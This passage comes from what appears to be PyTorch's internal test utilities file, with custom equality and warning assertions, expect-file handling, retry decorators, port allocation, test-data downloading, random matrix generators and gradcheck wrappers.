def maybe_to_tensor(a: Union[np.ndarray, torch.Tensor]) -> Union[np.ndarray, torch.Tensor]:
if not isinstance(a, np.ndarray):
return a
try:
return torch.from_numpy(a)
except TypeError:
# This happens if the dtype is non-numeric or not supported by torch
return a
def maybe_to_list(a: Any) -> Any:
if not isinstance(a, (np.ndarray, torch.Tensor)):
return a
return a.tolist()
x = maybe_to_tensor(x)
y = maybe_to_tensor(y)
if isinstance(x, torch.Tensor) and isinstance(y, torch.Tensor):
self.assertEqual(
x, y, atol=atol, rtol=rtol, msg=msg, exact_dtype=exact_dtype, exact_device=exact_device
)
else:
# In case we can't convert the array to a tensor, we fall back to comparing x and y as iterables
self.assertEqual(
maybe_to_list(x),
maybe_to_list(y),
atol=atol,
rtol=rtol,
msg=msg,
exact_dtype=exact_dtype,
exact_device=exact_device
)
elif isinstance(x, string_classes) and isinstance(y, string_classes):
debug_msg = ("Attempted to compare [string] types: "
f"Expected: {repr(x)}; Actual: {repr(y)}.")
super().assertEqual(x, y, msg=self._get_assert_msg(msg, debug_msg=debug_msg))
elif type(x) == set and type(y) == set:
debug_msg = ("Attempted to compare [set] types: "
f"Expected: {x}; Actual: {y}.")
super().assertEqual(x, y, msg=self._get_assert_msg(msg, debug_msg=debug_msg))
elif self._is_dict(x) and self._is_dict(y):
if isinstance(x, OrderedDict) and isinstance(y, OrderedDict):
self.assertEqual(x.items(), y.items(), atol=atol, rtol=rtol,
msg=msg, exact_dtype=exact_dtype,
exact_device=exact_device)
else:
self.assertEqual(set(x.keys()), set(y.keys()), atol=atol, rtol=rtol,
msg=msg, exact_dtype=exact_dtype,
exact_device=exact_device)
key_list = list(x.keys())
self.assertEqual([x[k] for k in key_list],
[y[k] for k in key_list],
atol=atol, rtol=rtol, msg=msg,
exact_dtype=exact_dtype, exact_device=exact_device)
elif isinstance(x, type) and isinstance(y, type):
# See TestTorch.test_assert_equal_generic_meta
debug_msg = ("Attempted to compare [type] types: "
f"Expected: {x}; Actual: {y}.")
super().assertEqual(x, y, msg=self._get_assert_msg(msg, debug_msg=debug_msg))
elif is_iterable(x) and is_iterable(y):
debug_msg = ("Attempted to compare the lengths of [iterable] types: "
f"Expected: {len(x)}; Actual: {len(y)}.")
super().assertEqual(len(x), len(y), msg=self._get_assert_msg(msg, debug_msg=debug_msg))
for x_, y_ in zip(x, y):
self.assertEqual(x_, y_, atol=atol, rtol=rtol, msg=msg,
exact_dtype=exact_dtype, exact_device=exact_device)
elif isinstance(x, bool) and isinstance(y, bool):
super().assertTrue(x == y, msg=msg)
# Scalar x Scalar
elif isinstance(x, Number) and isinstance(y, Number):
result, debug_msg_scalars = self._compareScalars(x, y, rtol=rtol, atol=atol,
equal_nan=equal_nan)
if not result:
assert debug_msg_scalars is not None
debug_msg = "Scalars failed to compare as equal! " + debug_msg_scalars
super().assertTrue(result, msg=self._get_assert_msg(msg, debug_msg=debug_msg))
else:
super().assertEqual(x, y, msg=msg)
def assertNotEqual(self, x, y, msg: Optional[str] = None, *, # type: ignore[override]
atol: Optional[float] = None, rtol: Optional[float] = None, **kwargs) -> None:
with self.assertRaises(AssertionError, msg=msg):
self.assertEqual(x, y, msg, atol=atol, rtol=rtol, **kwargs)
def assertEqualTypeString(self, x, y) -> None:
# This API is used to simulate the deprecated x.type() == y.type()
self.assertEqual(x.device, y.device)
self.assertEqual(x.dtype, y.dtype)
self.assertEqual(x.is_sparse, y.is_sparse)
def assertObjectIn(self, obj: Any, iterable: Iterable[Any]) -> None:
for elem in iterable:
if id(obj) == id(elem):
return
raise AssertionError("object not found in iterable")
# Reimplemented to provide special behavior when
# _ignore_not_implemented_error is True
def assertRaises(self, expected_exception, *args, **kwargs):
if self._ignore_not_implemented_error:
context: Optional[AssertRaisesContextIgnoreNotImplementedError] = \
AssertRaisesContextIgnoreNotImplementedError(expected_exception, self) # type: ignore[call-arg]
try:
return context.handle('assertRaises', args, kwargs) # type: ignore[union-attr]
finally:
# see https://bugs.python.org/issue23890
context = None
else:
return super().assertRaises(expected_exception, *args, **kwargs)
# Reimplemented to provide special behavior when
# _ignore_not_implemented_error is True
def assertRaisesRegex(self, expected_exception, expected_regex, *args, **kwargs):
if self._ignore_not_implemented_error:
context = AssertRaisesContextIgnoreNotImplementedError( # type: ignore[call-arg]
expected_exception, self, expected_regex)
return context.handle('assertRaisesRegex', args, kwargs) # type: ignore[attr-defined]
else:
return super().assertRaisesRegex(expected_exception, expected_regex, *args, **kwargs)
# TODO: Support context manager interface
# NB: The kwargs forwarding to callable robs the 'subname' parameter.
# If you need it, manually apply your callable in a lambda instead.
def assertExpectedRaises(self, exc_type, callable, *args, **kwargs):
subname = None
if 'subname' in kwargs:
subname = kwargs['subname']
del kwargs['subname']
try:
callable(*args, **kwargs)
except exc_type as e:
self.assertExpected(str(e), subname)
return
# Don't put this in the try block; the AssertionError will catch it
self.fail(msg="Did not raise when expected to")
def assertNotWarn(self, callable, msg=''):
r"""
Test that :attr:`callable` does not emit a warning.
"""
with warnings.catch_warnings(record=True) as ws:
warnings.simplefilter("always") # allow any warning to be raised
with set_warn_always_context(True):
callable()
self.assertTrue(len(ws) == 0, msg)
@contextmanager
def assertWarnsOnceRegex(self, category, regex=''):
"""Context manager for code that *must always* warn
This filters expected warnings from the test and fails if
the expected warning is not caught. It uses set_warn_always() to force
TORCH_WARN_ONCE to behave like TORCH_WARN
"""
pattern = re.compile(regex)
with warnings.catch_warnings(record=True) as ws:
warnings.simplefilter("always") # allow any warning to be raised
with set_warn_always_context(True):
yield
if len(ws) == 0:
self.fail('no warning caught')
self.assertTrue(any([type(w.message) is category for w in ws]))
self.assertTrue(
any([re.match(pattern, str(w.message)) for w in ws]),
f'{pattern}, {[w.message for w in ws if type(w.message) is category]}')
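# Example usage (illustrative sketch; `fn_that_warns` is hypothetical and expected to
# emit a UserWarning whose message starts with "deprecated", since re.match is used):
#
#   with self.assertWarnsOnceRegex(UserWarning, "deprecated"):
#       fn_that_warns()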
def assertExpected(self, s, subname=None):
r"""
Test that a string matches the recorded contents of a file
derived from the name of this test and subname. This file
is placed in the 'expect' directory in the same directory
as the test script. You can automatically update the recorded test
output using --accept.
If you call this multiple times in a single function, you must
give a unique subname each time.
"""
if not isinstance(s, str):
raise TypeError("assertExpected is strings only")
def remove_prefix(text, prefix):
if text.startswith(prefix):
return text[len(prefix):]
return text
# NB: we take __file__ from the module that defined the test
# class, so we place the expect directory where the test script
# lives, NOT where test/common_utils.py lives. This doesn't matter in
# PyTorch where all test scripts are in the same directory as
# test/common_utils.py, but it matters in onnx-pytorch
module_id = self.__class__.__module__
munged_id = remove_prefix(self.id(), module_id + ".")
test_file = os.path.realpath(sys.modules[module_id].__file__)
expected_file = os.path.join(os.path.dirname(test_file),
"expect",
munged_id)
subname_output = ""
if subname:
expected_file += "-" + subname
subname_output = " ({})".format(subname)
expected_file += ".expect"
expected = None
def accept_output(update_type):
print("Accepting {} for {}{}:\n\n{}".format(update_type, munged_id, subname_output, s))
with open(expected_file, 'w') as f:
# Adjust for producer_version, leave s unmodified
s_tag = re.sub(r'(producer_version): "[0-9.]*"',
r'\1: "CURRENT_VERSION"', s)
f.write(s_tag)
try:
with open(expected_file) as f:
expected = f.read()
except IOError as e:
if e.errno != errno.ENOENT:
raise
elif expecttest.ACCEPT:
return accept_output("output")
else:
raise RuntimeError(
("I got this output for {}{}:\n\n{}\n\n"
"No expect file exists; to accept the current output, run:\n"
"python {} {} --accept").format(munged_id, subname_output, s, __main__.__file__, munged_id)) from None
# a hack for JIT tests
if IS_WINDOWS:
expected = re.sub(r'CppOp\[(.+?)\]', 'CppOp[]', expected)
s = re.sub(r'CppOp\[(.+?)\]', 'CppOp[]', s)
# Adjust for producer_version
expected = expected.replace(
'producer_version: "CURRENT_VERSION"',
'producer_version: "{}"'.format(torch.onnx.producer_version)
)
if expecttest.ACCEPT:
if expected != s:
return accept_output("updated output")
else:
if hasattr(self, "assertMultiLineEqual"):
# Python 2.7 only
# NB: Python considers lhs "old" and rhs "new".
self.assertMultiLineEqual(expected, s)
else:
self.assertEqual(s, expected)
def assertExpectedStripMangled(self, s, subname=None):
s = re.sub(r'__torch__[^ ]+', '', s)
self.assertExpected(s, subname)
def assertGreaterAlmostEqual(self, first, second, places=None, msg=None, delta=None):
"""Assert that ``first`` is greater than or almost equal to ``second``.
The equality of ``first`` and ``second`` is determined in a similar way to
the ``assertAlmostEqual`` function of the standard library.
"""
if delta is not None and places is not None:
raise TypeError("specify delta or places not both")
if first >= second:
return
diff = second - first
if delta is not None:
if diff <= delta:
return
standardMsg = f"{first} not greater than or equal to {second} within {delta} delta"
else:
if places is None:
places = 7
if round(diff, places) == 0:
return
standardMsg = f"{first} not greater than or equal to {second} within {places} places"
msg = self._formatMessage(msg, standardMsg)
raise self.failureException(msg)
# run code in subprocess and capture exceptions.
@staticmethod
def run_process_no_exception(code, env=None):
import subprocess
popen = subprocess.Popen(
[sys.executable, '-c', code],
stdout=subprocess.PIPE,
stderr=subprocess.PIPE,
env=env)
(stdout, stderr) = popen.communicate()
return (stdout, stderr)
# returns captured stderr
@staticmethod
def runWithPytorchAPIUsageStderr(code):
env = os.environ.copy()
env["PYTORCH_API_USAGE_STDERR"] = "1"
# remove IN_CI flag since this is a wrapped test process.
# IN_CI flag should be set in the parent process only.
if "IN_CI" in env.keys():
del env["IN_CI"]
(stdout, stderr) = TestCase.run_process_no_exception(code, env=env)
return stderr.decode('ascii')
def download_file(url, binary=True):
from urllib.parse import urlsplit
from urllib import request, error
filename = os.path.basename(urlsplit(url)[2])
data_dir = get_writable_path(os.path.join(os.path.dirname(__file__), 'data'))
path = os.path.join(data_dir, filename)
if os.path.exists(path):
return path
try:
data = request.urlopen(url, timeout=15).read()
with open(path, 'wb' if binary else 'w') as f:
f.write(data)
return path
except error.URLError as e:
msg = "could not download test file '{}'".format(url)
warnings.warn(msg, RuntimeWarning)
raise unittest.SkipTest(msg) from e
def find_free_port():
"""
Finds an available port and returns that port number.
NOTE: If this function is being used to allocate a port to Store (or
indirectly via init_process_group or init_rpc), it should be used
in conjunction with the `retry_on_connect_failures` decorator, as there is a potential
race condition where the allocated port may become unavailable before it can be used.
"""
with closing(socket.socket(socket.AF_INET, socket.SOCK_STREAM)) as sock:
sock.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
sock.bind(('localhost', 0))
_, port = sock.getsockname()
return port
# Errors that we can get in c10d initialization for which we should retry tests for.
ADDRESS_IN_USE = "Address already in use"
CONNECT_TIMEOUT = "connect() timed out."
def retry_on_connect_failures(func=None, connect_errors=(ADDRESS_IN_USE,)):
"""Reruns a test if the test returns a RuntimeError and the exception
contains one of the strings in connect_errors."""
# This if block is executed when using this function as a decorator with arguments.
if func is None:
return partial(retry_on_connect_failures, connect_errors=connect_errors)
@wraps(func)
def wrapper(*args, **kwargs):
n_retries = 10
tries_remaining = n_retries
while True:
try:
return func(*args, **kwargs)
except RuntimeError as error:
if any(connect_error in str(error) for connect_error in connect_errors):
tries_remaining -= 1
if tries_remaining == 0:
raise RuntimeError(f"Failing after {n_retries} retries with error: {str(error)}")
time.sleep(random.random())
continue
raise
return wrapper
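# A minimal usage sketch (illustrative only, not called anywhere): wrap a test
# that binds to a freshly allocated port so it gets retried if the port is
# grabbed by another process before it can be used.
@retry_on_connect_failures
def _example_bind_to_free_port():
    port = find_free_port()
    # ... hand `port` to a Store / init_process_group call here (omitted) ...
    return port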
# Decorator to retry upon certain Exceptions.
def retry(ExceptionToCheck, tries=3, delay=3, skip_after_retries=False):
def deco_retry(f):
@wraps(f)
def f_retry(*args, **kwargs):
mtries, mdelay = tries, delay
while mtries > 1:
try:
return f(*args, **kwargs)
except ExceptionToCheck as e:
msg = "%s, Retrying in %d seconds..." % (str(e), mdelay)
print(msg)
time.sleep(mdelay)
mtries -= 1
try:
return f(*args, **kwargs)
except ExceptionToCheck as e:
raise unittest.SkipTest(f"Skipping after {tries} consecutive {str(e)}") from e if skip_after_retries else e
return f_retry # true decorator
return deco_retry
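# A minimal usage sketch (illustrative only, not called anywhere): retry a flaky
# network fetch a few times and turn persistent failures into a skipped test.
# The URL below is a placeholder, not a real test asset.
@retry(Exception, tries=3, delay=1, skip_after_retries=True)
def _example_flaky_fetch():
    return download_file("https://example.com/data.bin")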
# Methods for matrix generation
def random_square_matrix_of_rank(l, rank, dtype=torch.double, device='cpu'):
assert rank <= l
A = torch.randn(l, l, dtype=dtype, device=device)
u, s, vh = torch.linalg.svd(A, full_matrices=False)
for i in range(l):
if i >= rank:
s[i] = 0
elif s[i] == 0:
s[i] = 1
return (u * s.to(dtype).unsqueeze(-2)) @ vh
def random_well_conditioned_matrix(*shape, dtype, device, mean=1.0, sigma=0.001):
"""
Returns a random rectangular matrix (batch of matrices)
with singular values sampled from a Gaussian with
mean `mean` and standard deviation `sigma`.
The smaller the `sigma`, the better conditioned
the output matrix is.
"""
primitive_dtype = {
torch.float: torch.float,
torch.double: torch.double,
torch.cfloat: torch.float,
torch.cdouble: torch.double
}
x = torch.rand(shape, dtype=dtype, device=device)
m = x.size(-2)
n = x.size(-1)
u, _, vh = torch.linalg.svd(x, full_matrices=False)
s = (torch.randn(*(shape[:-2] + (min(m, n),)), dtype=primitive_dtype[dtype], device=device) * sigma + mean) \
.sort(-1, descending=True).values.to(dtype)
return (u * s.unsqueeze(-2)) @ vh
# Returns a noncontiguous tensor with the same shape and values as t.
# The noncontiguous tensor is constructed such that elements in the innermost
# dimension are separated by zeros or (whenever possible) nans
# TODO: consider more complicated noncontiguity schemes
def noncontiguous_like(t):
# Short-circuits if t is already noncontiguous
if not t.is_contiguous():
return t
# Special-cases 0-dim tensors
if t.ndim == 0:
result = t.detach().unsqueeze(0).repeat_interleave(2, dim=-1)
if t.dtype.is_floating_point or t.dtype.is_complex:
result[0] = math.nan
else:
result[0] = 0
result.set_(result.storage(), 1, t.size(), ())
result.requires_grad_(t.requires_grad)
return result
# 1+ dim tensor case
result = torch.repeat_interleave(t.detach(), 2, dim=-1)
if t.dtype.is_floating_point or t.dtype.is_complex:
result[..., 1::2] = math.nan
else:
result[..., 1::2] = 0
strides = list(result.stride())
strides[-1] = strides[-1] * 2
result.set_(result.storage(), result.storage_offset(), t.size(), stride=tuple(strides))
result.requires_grad_(t.requires_grad)
return result
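# A small illustrative check (not used by any test): noncontiguous_like doubles
# the innermost stride, so the values survive but .is_contiguous() becomes False.
def _example_noncontiguous_like():
    t = torch.arange(6.).reshape(2, 3)
    nc = noncontiguous_like(t)
    assert not nc.is_contiguous() and torch.equal(nc, t)
    return nc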
# TODO: remove this (prefer make_symmetric_matrices below)
def random_symmetric_matrix(l, *batches, **kwargs):
dtype = kwargs.get('dtype', torch.double)
device = kwargs.get('device', 'cpu')
A = torch.randn(*(batches + (l, l)), dtype=dtype, device=device)
A = (A + A.mT).div_(2)
return A
# Creates a symmetric matrix or batch of symmetric matrices
# Shape must be a square matrix or batch of square matrices
def make_symmetric_matrices(*shape, device, dtype):
assert shape[-1] == shape[-2]
t = make_tensor(shape, device=device, dtype=dtype)
t = (t + t.mT).div_(2)
return t
def random_hermitian_matrix(l, *batches, **kwargs):
dtype = kwargs.get('dtype', torch.double)
device = kwargs.get('device', 'cpu')
A = torch.randn(*(batches + (l, l)), dtype=dtype, device=device)
A = (A + A.mH).div_(2)
return A
def random_symmetric_psd_matrix(l, *batches, **kwargs):
"""
Returns a batch of random symmetric positive-semi-definite matrices.
The shape of the result is batch_dims + (matrix_size, matrix_size)
The following example creates a tensor of size 2 x 4 x 3 x 3
>>> matrices = random_symmetric_psd_matrix(3, 2, 4, dtype=dtype, device=device)
"""
dtype = kwargs.get('dtype', torch.double)
device = kwargs.get('device', 'cpu')
A = torch.randn(*(batches + (l, l)), dtype=dtype, device=device)
return A @ A.mT
def random_hermitian_psd_matrix(matrix_size, *batch_dims, dtype=torch.double, device='cpu'):
"""
Returns a batch of random Hermitian positive-semi-definite matrices.
The shape of the result is batch_dims + (matrix_size, matrix_size)
The following example creates a tensor of size 2 x 4 x 3 x 3
>>> matrices = random_hermitian_psd_matrix(3, 2, 4, dtype=dtype, device=device)
"""
A = torch.randn(*(batch_dims + (matrix_size, matrix_size)), dtype=dtype, device=device)
return A @ A.mH
# TODO: remove this (prefer make_symmetric_pd_matrices below)
def random_symmetric_pd_matrix(matrix_size, *batch_dims, **kwargs):
dtype = kwargs.get('dtype', torch.double)
device = kwargs.get('device', 'cpu')
A = torch.randn(*(batch_dims + (matrix_size, matrix_size)),
dtype=dtype, device=device)
return torch.matmul(A, A.mT) \
+ torch.eye(matrix_size, dtype=dtype, device=device) * 1e-5
# Creates a symmetric positive-definite matrix or batch of
# such matrices
def make_symmetric_pd_matrices(*shape, device, dtype):
assert shape[-1] == shape[-2]
t = make_tensor(shape, device=device, dtype=dtype)
i = torch.eye(shape[-1], device=device, dtype=dtype) * 1e-5
return t @ t.mT + i
def random_hermitian_pd_matrix(matrix_size, *batch_dims, dtype, device):
"""
Returns a batch of random Hermitian positive-definite matrices.
The shape of the result is batch_dims + (matrix_size, matrix_size)
The following example creates a tensor of size 2 x 4 x 3 x 3
>>> matrices = random_hermitian_pd_matrix(3, 2, 4, dtype=dtype, device=device)
"""
A = torch.randn(*(batch_dims + (matrix_size, matrix_size)),
dtype=dtype, device=device)
return A @ A.mH + torch.eye(matrix_size, dtype=dtype, device=device)
# TODO: remove this (prefer make_fullrank_matrices_with_distinct_singular_values below)
def random_fullrank_matrix_distinct_singular_value(matrix_size, *batch_dims,
**kwargs):
dtype = kwargs.get('dtype', torch.double)
device = kwargs.get('device', 'cpu')
silent = kwargs.get("silent", False)
if silent and not torch._C.has_lapack:
return torch.ones(matrix_size, matrix_size, dtype=dtype, device=device)
A = torch.randn(batch_dims + (matrix_size, matrix_size), dtype=dtype, device=device)
u, _, vh = torch.linalg.svd(A, full_matrices=False)
real_dtype = A.real.dtype if A.dtype.is_complex else A.dtype
s = torch.arange(1., matrix_size + 1, dtype=real_dtype, device=device).mul_(1.0 / (matrix_size + 1))
return (u * s.to(A.dtype)) @ vh
# Creates a full rank matrix with distinct singular values or
# a batch of such matrices
def make_fullrank_matrices_with_distinct_singular_values(*shape, device, dtype, requires_grad=False):
with torch.no_grad():
t = make_tensor(shape, device=device, dtype=dtype)
u, _, vh = torch.linalg.svd(t, full_matrices=False)
# TODO: improve the handling of complex tensors here
real_dtype = t.real.dtype if t.dtype.is_complex else t.dtype
k = min(shape[-1], shape[-2])
s = torch.arange(1., k + 1, dtype=real_dtype, device=device).mul_(1.0 / (k + 1))
x = (u * s.to(dtype)) @ vh
x.requires_grad_(requires_grad)
return x
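# A minimal usage sketch (illustrative only): the generated matrices have singular
# values 1/(k+1), 2/(k+1), ..., k/(k+1), so they are always invertible and safe to
# feed into tests of e.g. torch.linalg.inv or torch.linalg.solve.
def _example_fullrank_matrix_batch():
    return make_fullrank_matrices_with_distinct_singular_values(
        3, 4, 4, device='cpu', dtype=torch.double, requires_grad=True)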
def random_matrix(rows, columns, *batch_dims, **kwargs):
"""Return rectangular matrix or batches of rectangular matrices.
Parameters:
dtype - the data type
device - the device kind
singular - when True, the output will be singular
"""
dtype = kwargs.get('dtype', torch.double)
device = kwargs.get('device', 'cpu')
silent = kwargs.get("silent", False)
singular = kwargs.get("singular", False)
if silent and not torch._C.has_lapack:
return torch.ones(rows, columns, dtype=dtype, device=device)
A = torch.randn(batch_dims + (rows, columns), dtype=dtype, device=device)
if A.numel() == 0:
return A
u, _, vh = torch.linalg.svd(A, full_matrices=False)
k = min(rows, columns)
s = torch.linspace(1 / (k + 1), 1, k, dtype=dtype, device=device)
if singular:
# make matrix singular
s[k - 1] = 0
if k > 2:
# increase the order of singularity so that the pivoting
# in LU factorization will be non-trivial
s[0] = 0
return (u * s.unsqueeze(-2)) @ vh
def random_lowrank_matrix(rank, rows, columns, *batch_dims, **kwargs):
"""Return rectangular matrix or batches of rectangular matrices with
given rank.
"""
B = random_matrix(rows, rank, *batch_dims, **kwargs)
C = random_matrix(rank, columns, *batch_dims, **kwargs)
return B.matmul(C)
def random_sparse_matrix(rows, columns, density=0.01, **kwargs):
"""Return rectangular random sparse matrix within given density.
The density of the result approaches to given density as the size
of the matrix is increased and a relatively small value of density
is specified but higher than min(rows, columns)/(rows * columns)
for non-singular matrices.
"""
dtype = kwargs.get('dtype', torch.double)
device = kwargs.get('device', 'cpu')
singular = kwargs.get("singular", False)
k = min(rows, columns)
nonzero_elements = max(min(rows, columns), int(rows * columns * density))
row_indices = [i % rows for i in range(nonzero_elements)]
column_indices = [i % columns for i in range(nonzero_elements)]
random.shuffle(column_indices)
indices = [row_indices, column_indices]
values = torch.randn(nonzero_elements, dtype=dtype, device=device)
# ensure that the diagonal dominates
values *= torch.tensor([-float(i - j)**2 for i, j in zip(*indices)], dtype=dtype, device=device).exp()
indices_tensor = torch.tensor(indices)
A = torch.sparse_coo_tensor(indices_tensor, values, (rows, columns), device=device)
return A.coalesce()
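# A minimal usage sketch (illustrative only): roughly 1% of the entries of a
# 100x100 sparse COO matrix are populated, with the diagonal made dominant.
def _example_sparse_matrix():
    A = random_sparse_matrix(100, 100, density=0.01, dtype=torch.double, device='cpu')
    return A.to_dense()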
def random_sparse_pd_matrix(matrix_size, density=0.01, **kwargs):
"""Return random sparse positive-definite matrix with given density.
The eigenvalues of the matrix are defined as::
arange(1, matrix_size+1)/matrix_size
Algorithm:
A = diag(arange(1, matrix_size+1)/matrix_size)
while <A density is smaller than required>:
<choose random i, j in range(matrix_size), theta in [0, 2*pi]>
R = <rotation matrix (i,j,theta)>
A = R^T A R
"""
import math
torch = kwargs.get('torch', globals()['torch'])
dtype = kwargs.get('dtype', torch.double)
device = kwargs.get('device', 'cpu')
data = dict([((i, i), float(i + 1) / matrix_size)
for i in range(matrix_size)])
def multiply(data, N, i, j, cs, sn, left=True):
for k in range(N):
if left:
ik, jk = (k, i), (k, j)
else:
ik, jk = (i, k), (j, k)
aik, ajk = data.get(ik, 0), data.get(jk, 0)
aik, ajk = cs * aik + sn * ajk, -sn * aik + cs * ajk
if aik:
data[ik] = aik
else:
data.pop(ik, None)
if ajk:
data[jk] = ajk
else:
data.pop(jk, None)
target_nnz = density * matrix_size * matrix_size
while len(data) < target_nnz:
i = random.randint(0, matrix_size - 1)
j = random.randint(0, matrix_size - 1)
if i != j:
theta = random.uniform(0, 2 * math.pi)
cs = math.cos(theta)
sn = math.sin(theta)
multiply(data, matrix_size, i, j, cs, sn, left=True)
multiply(data, matrix_size, i, j, cs, sn, left=False)
icoords, jcoords, values = [], [], []
for (i, j), v in sorted(data.items()):
icoords.append(i)
jcoords.append(j)
values.append(v)
indices_tensor = torch.tensor([icoords, jcoords])
return torch.sparse_coo_tensor(indices_tensor, values, (matrix_size, matrix_size), dtype=dtype, device=device)
def do_test_dtypes(self, dtypes, layout, device):
for dtype in dtypes:
if dtype != torch.float16:
out = torch.zeros((2, 3), dtype=dtype, layout=layout, device=device)
self.assertIs(dtype, out.dtype)
self.assertIs(layout, out.layout)
self.assertEqual(device, out.device)
def do_test_empty_full(self, dtypes, layout, device):
shape = torch.Size([2, 3])
def check_value(tensor, dtype, layout, device, value, requires_grad):
self.assertEqual(shape, tensor.shape)
self.assertIs(dtype, tensor.dtype)
self.assertIs(layout, tensor.layout)
self.assertEqual(tensor.requires_grad, requires_grad)
if tensor.is_cuda and device is not None:
self.assertEqual(device, tensor.device)
if value is not None:
fill = tensor.new(shape).fill_(value)
self.assertEqual(tensor, fill)
def get_int64_dtype(dtype):
module = '.'.join(str(dtype).split('.')[1:-1])
if not module:
return torch.int64
return operator.attrgetter(module)(torch).int64
default_dtype = torch.get_default_dtype()
check_value(torch.empty(shape), default_dtype, torch.strided, -1, None, False)
check_value(torch.full(shape, -5.), default_dtype, torch.strided, -1, None, False)
for dtype in dtypes:
for rg in {dtype.is_floating_point, False}:
int64_dtype = get_int64_dtype(dtype)
v = torch.empty(shape, dtype=dtype, device=device, layout=layout, requires_grad=rg)
check_value(v, dtype, layout, device, None, rg)
out = v.new()
check_value(torch.empty(shape, out=out, device=device, layout=layout, requires_grad=rg),
dtype, layout, device, None, rg)
check_value(v.new_empty(shape), dtype, layout, device, None, False)
check_value(v.new_empty(shape, dtype=int64_dtype, device=device, requires_grad=False),
int64_dtype, layout, device, None, False)
check_value(torch.empty_like(v), dtype, layout, device, None, False)
check_value(torch.empty_like(v, dtype=int64_dtype, layout=layout, device=device, requires_grad=False),
int64_dtype, layout, device, None, False)
if dtype is not torch.float16 and layout != torch.sparse_coo:
fv = 3
v = torch.full(shape, fv, dtype=dtype, layout=layout, device=device, requires_grad=rg)
check_value(v, dtype, layout, device, fv, rg)
check_value(v.new_full(shape, fv + 1), dtype, layout, device, fv + 1, False)
out = v.new()
check_value(torch.full(shape, fv + 2, out=out, device=device, layout=layout, requires_grad=rg),
dtype, layout, device, fv + 2, rg)
check_value(v.new_full(shape, fv + 3, dtype=int64_dtype, device=device, requires_grad=False),
int64_dtype, layout, device, fv + 3, False)
check_value(torch.full_like(v, fv + 4), dtype, layout, device, fv + 4, False)
check_value(torch.full_like(v, fv + 5,
dtype=int64_dtype, layout=layout, device=device, requires_grad=False),
int64_dtype, layout, device, fv + 5, False)
# This helper method recursively clones the
# tensor-type inputs of operators tested by OpInfo
def clone_input_helper(input):
if isinstance(input, torch.Tensor):
return torch.clone(input)
if isinstance(input, Sequence):
return tuple(map(clone_input_helper, input))
return input
THESE_TAKE_WAY_TOO_LONG = {
'test_Conv3d_groups',
'test_conv_double_backward',
'test_conv_double_backward_groups',
'test_Conv3d_dilated',
'test_Conv3d_stride_padding',
'test_Conv3d_dilated_strided',
'test_Conv3d',
'test_Conv2d_dilated',
'test_ConvTranspose3d_dilated',
'test_ConvTranspose2d_dilated',
'test_snli',
'test_Conv2d',
'test_Conv2d_padding',
'test_ConvTranspose2d_no_bias',
'test_ConvTranspose2d',
'test_ConvTranspose3d',
'test_Conv2d_no_bias',
'test_matmul_4d_4d',
'test_multinomial_invalid_probs',
}
running_script_path = None
def set_running_script_path():
global running_script_path
try:
running_file = os.path.abspath(os.path.realpath(sys.argv[0]))
if running_file.endswith('.py'): # skip if the running file is not a script
running_script_path = running_file
except Exception:
pass
def check_test_defined_in_running_script(test_case):
if running_script_path is None:
return
test_case_class_file = os.path.abspath(os.path.realpath(inspect.getfile(test_case.__class__)))
assert test_case_class_file == running_script_path, "Class of loaded TestCase \"{}\" " \
"is not defined in the running script \"{}\", but in \"{}\". Did you " \
"accidentally import a unittest.TestCase from another file?".format(
test_case.id(), running_script_path, test_case_class_file)
def load_tests(loader, tests, pattern):
set_running_script_path()
test_suite = unittest.TestSuite()
for test_group in tests:
for test in test_group:
check_test_defined_in_running_script(test)
test_suite.addTest(test)
return test_suite
class BytesIOContext(io.BytesIO):
def __enter__(self):
return self
def __exit__(self, *args):
pass
# Tentative value for nondet_tol for gradcheck when backward implementation
# relies on nondeterministic operations, i.e., those listed here:
# https://pytorch.org/docs/stable/generated/torch.use_deterministic_algorithms.html
#
# For more information see https://github.com/pytorch/pytorch/issues/56202
GRADCHECK_NONDET_TOL = 1e-12
def gradcheck(fn, inputs, **kwargs):
# Wrapper around gradcheck that enables certain keys by default.
# Use this testing-internal gradcheck instead of autograd.gradcheck so that new features like vmap and
    # forward-mode AD are tested by default. We create this wrapper because we'd like to keep new checks
    # disabled by default for the public-facing api to avoid breaking user code.
#
# All PyTorch devs doing testing should use this wrapper instead of autograd.gradcheck.
default_values = {
"check_batched_grad": True,
"fast_mode": True,
}
    if os.environ.get('PYTORCH_TEST_WITH_SLOW_GRADCHECK', "OFF") == "ON":
default_values["fast_mode"] = False
for key, value in default_values.items():
        # default values override values explicitly set to None
k = kwargs.get(key, None)
kwargs[key] = k if k is not None else value
return torch.autograd.gradcheck(fn, inputs, **kwargs)
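# A minimal usage sketch (illustrative only, not called anywhere): the wrapper is
# invoked exactly like torch.autograd.gradcheck, but batched-grad checking and
# fast mode are turned on by default.
def _example_gradcheck():
    x = torch.randn(3, dtype=torch.double, requires_grad=True)
    return gradcheck(torch.sin, (x,))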
def gradgradcheck(fn, inputs, grad_outputs=None, **kwargs):
# Wrapper around gradgradcheck that enables certain keys by default
# See gradcheck above for an explanation of why we need something like this.
#
# All PyTorch devs doing testing should use this wrapper instead of autograd.gradgradcheck
default_values = {
"check_batched_grad": True,
"fast_mode": True,
}
    if os.environ.get('PYTORCH_TEST_WITH_SLOW_GRADCHECK', "OFF") == "ON":
default_values["fast_mode"] = False
for key, value in default_values.items():
        # default values override values explicitly set to None
k = kwargs.get(key, None)
kwargs[key] = k if k is not None else value
return torch.autograd.gradgradcheck(fn, inputs, grad_outputs, **kwargs)
def _assertGradAndGradgradChecks(test_case, apply_fn, inputs, **kwargs):
# call assert function rather than returning a bool since it's nicer
# if we get whether this failed on the gradcheck or the gradgradcheck.
test_case.assertTrue(gradcheck(apply_fn, inputs, **kwargs))
test_case.assertTrue(gradgradcheck(apply_fn, inputs, **kwargs))
@contextmanager
def set_cwd(path: str) -> Iterator[None]:
old_cwd = os.getcwd()
try:
os.chdir(path)
yield
finally:
os.chdir(old_cwd)
# Using @precisionOverride specific to your test is the recommended way
# of doing this. These are just some values that worked for test_nn.
dtype2prec_DONTUSE = {torch.float: 1e-5,
torch.double: 1e-5,
torch.half: 1e-2,
torch.bfloat16: 1e-1}
def _wrap_warn_once(regex):
def decorator(fn):
def inner(self, *args, **kwargs):
with self.assertWarnsOnceRegex(UserWarning, regex):
fn(self, *args, **kwargs)
return inner
return decorator
# This is a wrapper that wraps a test to run this test twice, one with
# coalesced=True, another with coalesced=False for coalesced/uncoalesced sparse tensors.
def coalescedonoff(f):
@wraps(f)
def wrapped(self, *args, **kwargs):
